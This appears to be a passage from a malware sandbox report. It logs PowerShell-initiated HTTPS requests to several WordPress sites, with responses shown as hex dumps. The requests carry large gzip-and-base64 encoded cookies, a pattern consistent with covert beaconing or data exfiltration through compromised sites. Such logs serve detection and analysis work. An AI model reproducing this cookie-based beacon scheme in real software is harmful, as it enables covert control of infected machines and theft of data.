                                                    Cookie: EAD88BCF93=8DytH4sIAAAAAAAEAI2UbW+bMBDHv4p5t0kTCk2GuuWVAybxhAHZkLQTMsoSr0PiSUDWVuLDzyZhIUqV9gUI3/3u8N39bei6EUOUBdR3sIu49T0O6vKp3ub2tt12GgwCG4ZQ2aNG1E0M6/bPoY5hVSkgpuU2T4unTrPKPC+LU6yTZqIZ5QK9IT4yx8VbEZ9e7s3PV2GgN98K3piz6d27v/NJEIWIepAgvjEm5iyZTPtErBI7Fb1Ji3353MTNa9OKfHoX7/K9Ll5Ep9l1+lfUquAxxwbu6G7iM9ZpK58gm+K1aulxFcBwxS+62Gmub0H3vR675W6bKXbpe3JWa0R5HJ8r8CKyQDTxnUQO0UKM+ZRxw+w0vxD9jq4SDw6JMH6qJvHCTlNbRA8h12Wz5jp6QHN9AcO5bhF7rq8XTL2k7QdTj/zYMEe9VnOdMEtigStzDJtIILVWOERWGFHEIbHN2diLbeSF2MGyGly0IjNnwJFayl6BCUi5Fxkwvt4D1oqqkgIDxvQLWIrikBaix8epXLRGLjfHJorWmGHf49/EZC8dZ01fSfymZi/dtwT6n3xbjdIdLVxsnYcRHH5l6a7TjjIaJjWsaVm2I7F1WohIcFsicSjySoIf5NS5t30CsTc6DmdjQn1IsLccboZLpj9Fg4qVYXSBXEr8WRaQ1hel/EQsQR5cuChhj4xAjxtKihuCOUl3ddmUv1twooExAbKR/wCKrk1jqAQAAO2nDg==; EAD88BCF931=8DytH4sIAAAAAAAEAGVRy26DMBD8lfIDOVW9E4c2HKKgkDRSLhUyC2zjl7yGgMTHdx3S9FD54JmdHe/DVV+jrds5kdZ0lgID8kR8hUZbMye1Uku8vuk5gdEp68HPSWNNqP2waHmtYE6wbUZxykvwA8oHz3asmgBKuO1GFOUg/zhIvPPvDr/o16SoiuV3oK2fXoTVzgMRxlb2TcMpQqG8Hu2hjxEDqXOr/EOI1RnNs7KzN/DUgVJzUrA [TRUNCATED]
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                    Host: saeedmdcat.com
                                                    Connection: Close
                                                    2024-12-18 10:19:15 UTC420INHTTP/1.1 200 OK
                                                    Date: Wed, 18 Dec 2024 10:19:15 GMT
                                                    Server: Apache/2.4.62 (Unix) OpenSSL/1.0.2k-fips
                                                    Vary: Cookie,User-Agent,Accept-Encoding
                                                    Accept-Ranges: bytes
                                                    Content-Length: 65713
                                                    Cache-Control: max-age=3600, public
                                                    Expires: Wed, 18 Dec 2024 10:19:15 GMT
                                                    Referrer-Policy: no-referrer-when-downgrade
                                                    X-Powered-By: WP Rocket/3.8.7
                                                    Pragma: public
                                                    Connection: close
                                                    Content-Type: text/html; charset=UTF-8
                                                    2024-12-18 10:19:15 UTC7772INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 73 74 79 6c 65 3e 69 6d 67 3a 69 73 28 5b 73 69 7a 65 73 3d 22 61 75 74 6f 22 20 69 5d 2c
                                                    Data Ascii: <!doctype html><html lang="en-US" prefix="og: https://ogp.me/ns#"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><style>img:is([sizes="auto" i],
                                                    2024-12-18 10:19:15 UTC8000INData Raw: 61 6c 54 72 61 63 6b 65 72 2e 74 72 61 63 6b 65 72 73 5b 68 6f 6f 6b 4e 61 6d 65 5d 28 70 61 72 61 6d 65 74 65 72 73 29 3b 0a 09 09 09 09 09 09 09 7d 20 65 6c 73 65 20 7b 0a 09 09 09 09 09 09 09 09 5f 5f 67 74 61 67 44 61 74 61 4c 61 79 65 72 28 27 65 76 65 6e 74 27 2c 20 6e 61 6d 65 2c 20 70 61 72 61 6d 65 74 65 72 73 29 3b 0a 09 09 09 09 09 09 09 7d 0a 09 09 09 09 09 09 09 0a 09 09 09 09 09 09 7d 20 65 6c 73 65 20 7b 0a 09 09 09 09 09 09 09 5f 5f 67 74 61 67 44 61 74 61 4c 61 79 65 72 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 20 61 72 67 75 6d 65 6e 74 73 29 3b 0a 09 09 09 09 09 09 7d 0a 09 09 09 09 09 7d 0a 0a 09 09 09 09 09 5f 5f 67 74 61 67 54 72 61 63 6b 65 72 28 27 6a 73 27 2c 20 6e 65 77 20 44 61 74 65 28 29 29 3b 0a 09 09 09 09 09 5f 5f 67 74 61 67 54
                                                    Data Ascii: alTracker.trackers[hookName](parameters);} else {__gtagDataLayer('event', name, parameters);}} else {__gtagDataLayer.apply(null, arguments);}}__gtagTracker('js', new Date());__gtagT
                                                    2024-12-18 10:19:15 UTC8000INData Raw: 65 6e 74 2d 73 69 7a 65 3a 20 38 30 30 70 78 3b 2d 2d 77 70 2d 2d 73 74 79 6c 65 2d 2d 67 6c 6f 62 61 6c 2d 2d 77 69 64 65 2d 73 69 7a 65 3a 20 31 32 30 30 70 78 3b 20 7d 3a 77 68 65 72 65 28 62 6f 64 79 29 20 7b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 7d 2e 77 70 2d 73 69 74 65 2d 62 6c 6f 63 6b 73 20 3e 20 2e 61 6c 69 67 6e 6c 65 66 74 20 7b 20 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 32 65 6d 3b 20 7d 2e 77 70 2d 73 69 74 65 2d 62 6c 6f 63 6b 73 20 3e 20 2e 61 6c 69 67 6e 72 69 67 68 74 20 7b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 65 6d 3b 20 7d 2e 77 70 2d 73 69 74 65 2d 62 6c 6f 63 6b 73 20 3e 20 2e 61 6c 69 67 6e 63 65 6e 74 65 72 20 7b 20 6a 75 73 74 69 66 79 2d 63
                                                    Data Ascii: ent-size: 800px;--wp--style--global--wide-size: 1200px; }:where(body) { margin: 0; }.wp-site-blocks > .alignleft { float: left; margin-right: 2em; }.wp-site-blocks > .alignright { float: right; margin-left: 2em; }.wp-site-blocks > .aligncenter { justify-c
                                                    2024-12-18 10:19:15 UTC8000INData Raw: 68 65 6c 6c 6f 2d 65 6c 65 6d 65 6e 74 6f 72 2f 73 74 79 6c 65 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 33 2e 32 2e 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 68 65 6c 6c 6f 2d 65 6c 65 6d 65 6e 74 6f 72 2d 74 68 65 6d 65 2d 73 74 79 6c 65 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 73 61 65 65 64 6d 64 63 61 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 68 65 6c 6c 6f 2d 65 6c 65 6d 65 6e 74 6f 72 2f 74 68 65 6d 65 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 33 2e 32 2e 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 68 65 6c 6c 6f 2d 65 6c 65
                                                    Data Ascii: hello-elementor/style.min.css?ver=3.2.1' media='all' /><link rel='stylesheet' id='hello-elementor-theme-style-css' href='https://saeedmdcat.com/wp-content/themes/hello-elementor/theme.min.css?ver=3.2.1' media='all' /><link rel='stylesheet' id='hello-ele
                                                    2024-12-18 10:19:16 UTC8000INData Raw: 39 20 65 6c 65 6d 65 6e 74 6f 72 2d 70 61 67 65 20 65 6c 65 6d 65 6e 74 6f 72 2d 70 61 67 65 2d 31 30 36 30 22 3e 0a 0a 0a 3c 61 20 63 6c 61 73 73 3d 22 73 6b 69 70 2d 6c 69 6e 6b 20 73 63 72 65 65 6e 2d 72 65 61 64 65 72 2d 74 65 78 74 22 20 68 72 65 66 3d 22 23 63 6f 6e 74 65 6e 74 22 3e 53 6b 69 70 20 74 6f 20 63 6f 6e 74 65 6e 74 3c 2f 61 3e 0a 0a 3c 68 65 61 64 65 72 20 69 64 3d 22 73 69 74 65 2d 68 65 61 64 65 72 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 68 65 61 64 65 72 20 64 79 6e 61 6d 69 63 2d 68 65 61 64 65 72 20 6d 65 6e 75 2d 64 72 6f 70 64 6f 77 6e 2d 6d 6f 62 69 6c 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 2d 69 6e 6e 65 72 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 62 72 61 6e 64 69 6e 67
                                                    Data Ascii: 9 elementor-page elementor-page-1060"><a class="skip-link screen-reader-text" href="#content">Skip to content</a><header id="site-header" class="site-header dynamic-header menu-dropdown-mobile"><div class="header-inner"><div class="site-branding
                                                    2024-12-18 10:19:16 UTC8000INData Raw: 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 31 32 35 32 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 61 65 65 64 6d 64 63 61 74 2e 63 6f 6d 2f 6b 69 70 73 2d 73 75 70 65 72 2d 66 69 6e 61 6c 2d 73 65 73 73 69 6f 6e 32 30 32 30 2f 22 3e 4b 49 50 53 20 53 55 50 45 52 20 46 49 4e 41 4c 20 53 45 53 53 49 4f 4e 28 32 30 32 30 29 3c 2f 61 3e 3c 2f 6c 69 3e 0a 09 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 75 73 74 6f 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 63 75 73 74 6f 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 31 34 30 38 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70
                                                    Data Ascii: m-type-post_type menu-item-object-page menu-item-1252"><a href="https://saeedmdcat.com/kips-super-final-session2020/">KIPS SUPER FINAL SESSION(2020)</a></li><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1408"><a href="http
                                                    2024-12-18 10:19:16 UTC8000INData Raw: 6d 67 20 64 65 63 6f 64 69 6e 67 3d 22 61 73 79 6e 63 22 20 77 69 64 74 68 3d 22 33 30 30 22 20 68 65 69 67 68 74 3d 22 33 30 30 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 61 65 65 64 6d 64 63 61 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 31 2f 31 32 2f 53 54 45 50 2d 32 30 32 31 2d 33 30 30 78 33 30 30 2e 6a 70 65 67 22 20 63 6c 61 73 73 3d 22 61 74 74 61 63 68 6d 65 6e 74 2d 6d 65 64 69 75 6d 20 73 69 7a 65 2d 6d 65 64 69 75 6d 20 77 70 2d 69 6d 61 67 65 2d 31 33 35 37 22 20 61 6c 74 3d 22 22 20 73 72 63 73 65 74 3d 22 68 74 74 70 73 3a 2f 2f 73 61 65 65 64 6d 64 63 61 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 31 2f 31 32 2f 53 54 45 50 2d 32 30 32 31 2d 33 30 30 78
                                                    Data Ascii: mg decoding="async" width="300" height="300" src="https://saeedmdcat.com/wp-content/uploads/2021/12/STEP-2021-300x300.jpeg" class="attachment-medium size-medium wp-image-1357" alt="" srcset="https://saeedmdcat.com/wp-content/uploads/2021/12/STEP-2021-300x
                                                    2024-12-18 10:19:16 UTC8000INData Raw: 74 69 6f 6e 28 74 29 7b 74 68 69 73 2e 74 72 69 67 67 65 72 45 76 65 6e 74 73 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 65 2c 74 2e 75 73 65 72 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 2c 74 2e 6f 70 74 69 6f 6e 73 29 7d 29 7d 7d 2c 7b 6b 65 79 3a 22 5f 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 68 69 73 2e 74 72 69 67 67 65 72 45 76 65 6e 74 73 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 65 2c 74 2e 75 73 65 72 45 76 65 6e 74 4c 69 73 74 65 6e 65 72
                                                    Data Ascii: tion(t){this.triggerEvents.forEach(function(e){return window.addEventListener(e,t.userEventListener,t.options)})}},{key:"_removeEventListener",value:function(t){this.triggerEvents.forEach(function(e){return window.removeEventListener(e,t.userEventListener
                                                    2024-12-18 10:19:16 UTC1941INData Raw: 3a 7b 22 70 61 67 65 22 3a 5b 5d 2c 22 65 64 69 74 6f 72 50 72 65 66 65 72 65 6e 63 65 73 22 3a 5b 5d 7d 2c 22 6b 69 74 22 3a 7b 22 61 63 74 69 76 65 5f 62 72 65 61 6b 70 6f 69 6e 74 73 22 3a 5b 22 76 69 65 77 70 6f 72 74 5f 6d 6f 62 69 6c 65 22 2c 22 76 69 65 77 70 6f 72 74 5f 74 61 62 6c 65 74 22 5d 2c 22 67 6c 6f 62 61 6c 5f 69 6d 61 67 65 5f 6c 69 67 68 74 62 6f 78 22 3a 22 79 65 73 22 2c 22 6c 69 67 68 74 62 6f 78 5f 65 6e 61 62 6c 65 5f 63 6f 75 6e 74 65 72 22 3a 22 79 65 73 22 2c 22 6c 69 67 68 74 62 6f 78 5f 65 6e 61 62 6c 65 5f 66 75 6c 6c 73 63 72 65 65 6e 22 3a 22 79 65 73 22 2c 22 6c 69 67 68 74 62 6f 78 5f 65 6e 61 62 6c 65 5f 7a 6f 6f 6d 22 3a 22 79 65 73 22 2c 22 6c 69 67 68 74 62 6f 78 5f 65 6e 61 62 6c 65 5f 73 68 61 72 65 22 3a 22 79 65
                                                    Data Ascii: :{"page":[],"editorPreferences":[]},"kit":{"active_breakpoints":["viewport_mobile","viewport_tablet"],"global_image_lightbox":"yes","lightbox_enable_counter":"yes","lightbox_enable_fullscreen":"yes","lightbox_enable_zoom":"yes","lightbox_enable_share":"ye


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    11192.168.11.2049725129.232.136.1704431972C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-18 10:19:24 UTC2277OUTGET / HTTP/1.1
                                                    Cookie: EAD88BCF93=8DytH4sIAAAAAAAEAI2UbW+bMBDHv4p5t0kTCk2GuuWVAybxhAHZkLQTMsoSr0PiSUDWVuLDzyZhIUqV9gUI3/3u8N39bei6EUOUBdR3sIu49T0O6vKp3ub2tt12GgwCG4ZQ2aNG1E0M6/bPoY5hVSkgpuU2T4unTrPKPC+LU6yTZqIZ5QK9IT4yx8VbEZ9e7s3PV2GgN98K3piz6d27v/NJEIWIepAgvjEm5iyZTPtErBI7Fb1Ji3353MTNa9OKfHoX7/K9Ll5Ep9l1+lfUquAxxwbu6G7iM9ZpK58gm+K1aulxFcBwxS+62Gmub0H3vR675W6bKXbpe3JWa0R5HJ8r8CKyQDTxnUQO0UKM+ZRxw+w0vxD9jq4SDw6JMH6qJvHCTlNbRA8h12Wz5jp6QHN9AcO5bhF7rq8XTL2k7QdTj/zYMEe9VnOdMEtigStzDJtIILVWOERWGFHEIbHN2diLbeSF2MGyGly0IjNnwJFayl6BCUi5Fxkwvt4D1oqqkgIDxvQLWIrikBaix8epXLRGLjfHJorWmGHf49/EZC8dZ01fSfymZi/dtwT6n3xbjdIdLVxsnYcRHH5l6a7TjjIaJjWsaVm2I7F1WohIcFsicSjySoIf5NS5t30CsTc6DmdjQn1IsLccboZLpj9Fg4qVYXSBXEr8WRaQ1hel/EQsQR5cuChhj4xAjxtKihuCOUl3ddmUv1twooExAbKR/wCKrk1jqAQAAO2nDg==; EAD88BCF931=8DytH4sIAAAAAAAEAGVRy26DMBD8lfIDOVW9E4c2HKKgkDRSLhUyC2zjl7yGgMTHdx3S9FD54JmdHe/DVV+jrds5kdZ0lgID8kR8hUZbMye1Uku8vuk5gdEp68HPSWNNqP2waHmtYE6wbUZxykvwA8oHz3asmgBKuO1GFOUg/zhIvPPvDr/o16SoiuV3oK2fXoTVzgMRxlb2TcMpQqG8Hu2hjxEDqXOr/EOI1RnNs7KzN/DUgVJzUrA [TRUNCATED]
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                    Host: wickandjuice.co.za
                                                    Connection: Close
                                                    2024-12-18 10:19:26 UTC422INHTTP/1.1 200 OK
                                                    Date: Wed, 18 Dec 2024 10:19:24 GMT
                                                    Server: Apache
                                                    Link: <https://wickandjuice.co.za/wp-json/>; rel="https://api.w.org/", <https://wickandjuice.co.za/wp-json/wp/v2/pages/2139>; rel="alternate"; type="application/json", <https://wickandjuice.co.za/>; rel=shortlink
                                                    Upgrade: h2,h2c
                                                    Connection: Upgrade, close
                                                    Vary: Accept-Encoding
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=UTF-8
                                                    2024-12-18 10:19:26 UTC7770INData Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 5a 41 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74
                                                    Data Ascii: 2000<!DOCTYPE html><html lang="en-ZA" prefix="og: https://ogp.me/ns#"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><link rel="pingback" href="htt
                                                    2024-12-18 10:19:26 UTC428INData Raw: 3a 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 7d 29 2c 61 3d 6e 65 77 20 57 6f 72 6b 65 72 28 55 52 4c 2e 63 72 65 61 74 65 4f 62 6a 65 63 74 55 52 4c 28 72 29 2c 7b 6e 61 6d 65 3a 22 77 70 54 65 73 74 45 6d 6f 6a 69 53 75 70 70 6f 72 74 73 22 7d 29 3b 72 65 74 75 72 6e 20 76 6f 69 64 28 61 2e 6f 6e 6d 65 73 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 20 69 6e 20 65 29 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74
                                                    Data Ascii: :"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everyt
                                                    2024-12-18 10:19:26 UTC2INData Raw: 0d 0a
                                                    Data Ascii:
                                                    2024-12-18 10:19:26 UTC8192INData Raw: 32 30 30 30 0d 0a 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 7c 7c 28 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 2c 28 65 3d 6e 2e 73 6f 75 72 63 65 7c 7c 7b 7d 29 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 3f 74 28 65 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 29 3a 65 2e 77 70 65 6d 6f 6a 69 26
                                                    Data Ascii: 2000orts.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&
                                                    2024-12-18 10:19:26 UTC6INData Raw: 78 20 72 67 62 61
                                                    Data Ascii: x rgba
                                                    2024-12-18 10:19:26 UTC2INData Raw: 0d 0a
                                                    Data Ascii:
                                                    2024-12-18 10:19:26 UTC8192INData Raw: 32 30 30 30 0d 0a 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 7d 3a 77 68 65 72 65 28 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 30 2e 35 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 30 2e 35 65 6d 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 6f 77 20 3e 20 2e 61 6c 69 67 6e 6c 65 66 74 7b 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 30 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 32 65 6d 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 6f 77 20 3e 20 2e 61 6c 69 67 6e 72 69 67 68 74 7b 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 32
                                                    Data Ascii: 2000(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float: left;margin-inline-start: 0;margin-inline-end: 2em;}body .is-layout-flow > .alignright{float: right;margin-inline-start: 2
                                                    2024-12-18 10:19:26 UTC6INData Raw: 3d 27 65 6c 65 63
                                                    Data Ascii: ='elec
                                                    2024-12-18 10:19:26 UTC2INData Raw: 0d 0a
                                                    Data Ascii:
                                                    2024-12-18 10:19:26 UTC8192INData Raw: 32 30 30 30 0d 0a 74 72 6f 2d 73 74 79 6c 65 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 69 63 6b 61 6e 64 6a 75 69 63 65 2e 63 6f 2e 7a 61 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 65 6c 65 63 74 72 6f 2f 73 74 79 6c 65 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 33 2e 30 2e 33 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 79 69 74 68 5f 79 77 72 61 71 5f 66 72 6f 6e 74 65 6e 64 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 69 63 6b 61 6e 64 6a 75 69 63 65 2e 63 6f 2e 7a 61 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 79 69 74 68 2d 77 6f 6f 63 6f 6d 6d 65 72 63
                                                    Data Ascii: 2000tro-style-css' href='https://wickandjuice.co.za/wp-content/themes/electro/style.min.css?ver=3.0.3' type='text/css' media='all' /><link rel='stylesheet' id='yith_ywraq_frontend-css' href='https://wickandjuice.co.za/wp-content/plugins/yith-woocommerc


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    12192.168.11.2049726141.193.213.104438988C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-18 10:19:36 UTC2261OUTGET / HTTP/1.1
                                                    Cookie: EAD88BCF93=8DytH4sIAAAAAAAEAI2UbW+bMBDHv4p5t0kTCk2GuuWVAybxhAHZkLQTMsoSr0PiSUDWVuLDzyZhIUqV9gUI3/3u8N39bei6EUOUBdR3sIu49T0O6vKp3ub2tt12GgwCG4ZQ2aNG1E0M6/bPoY5hVSkgpuU2T4unTrPKPC+LU6yTZqIZ5QK9IT4yx8VbEZ9e7s3PV2GgN98K3piz6d27v/NJEIWIepAgvjEm5iyZTPtErBI7Fb1Ji3353MTNa9OKfHoX7/K9Ll5Ep9l1+lfUquAxxwbu6G7iM9ZpK58gm+K1aulxFcBwxS+62Gmub0H3vR675W6bKXbpe3JWa0R5HJ8r8CKyQDTxnUQO0UKM+ZRxw+w0vxD9jq4SDw6JMH6qJvHCTlNbRA8h12Wz5jp6QHN9AcO5bhF7rq8XTL2k7QdTj/zYMEe9VnOdMEtigStzDJtIILVWOERWGFHEIbHN2diLbeSF2MGyGly0IjNnwJFayl6BCUi5Fxkwvt4D1oqqkgIDxvQLWIrikBaix8epXLRGLjfHJorWmGHf49/EZC8dZ01fSfymZi/dtwT6n3xbjdIdLVxsnYcRHH5l6a7TjjIaJjWsaVm2I7F1WohIcFsicSjySoIf5NS5t30CsTc6DmdjQn1IsLccboZLpj9Fg4qVYXSBXEr8WRaQ1hel/EQsQR5cuChhj4xAjxtKihuCOUl3ddmUv1twooExAbKR/wCKrk1jqAQAAO2nDg==; EAD88BCF931=8DytH4sIAAAAAAAEAGVQy26DMBD8lfIDOVW9E4c2HBAoThoplwqZBbbxS15DQOLja4c0PVQcmN2Z8eyuMLo35JdEkCMKP98qo5ekkXLtNze1JDBZaRy4JWmN9o0bVy5vJCwJdu3ETjkHN6J41FkRWO1BMrvfsYqP4q8Ggff6u8cv+jVJqmN8Acq4+YUZZR0QYRylbNsgYRLF9WgOQ+xoSK3d5B+Mbc6on8nW3MBRD1IuSRX8oH3twxv [TRUNCATED]
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                    Host: skagitorganics.net
                                                    Connection: Close
                                                    2024-12-18 10:19:37 UTC991INHTTP/1.1 200 OK
